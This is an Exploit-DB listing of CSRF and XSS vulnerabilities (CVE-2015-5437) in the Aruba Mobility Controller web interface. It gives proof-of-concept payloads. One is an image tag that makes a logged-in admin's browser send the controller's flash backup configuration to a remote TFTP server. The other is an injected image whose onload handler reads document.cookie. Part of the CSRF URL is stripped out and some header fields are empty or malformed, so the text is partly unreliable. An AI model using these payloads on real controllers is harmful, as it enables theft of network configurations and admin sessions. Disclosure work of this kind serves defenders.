Aruba Mobility Controller - Multiple vulnerabilities

ID EDB-ID:37891
Type exploitdb
Reporter Itzik Chen
Modified 2015-08-20T00:00:00


Aruba Mobility Controller - Multiple vulnerabilities. CVE-2015-5437. Webapps exploit for xml platform

                                            # Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page:
# Affected Version:
# Tested on: Aruba7240, Ver



Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.

Proof of Concept - CSRF
========================= - Controller IP-Address - Remote TFTP server 

<IMG width=1 height=1 SRC=",,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.

Proof of Concept - XSS
=========================</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>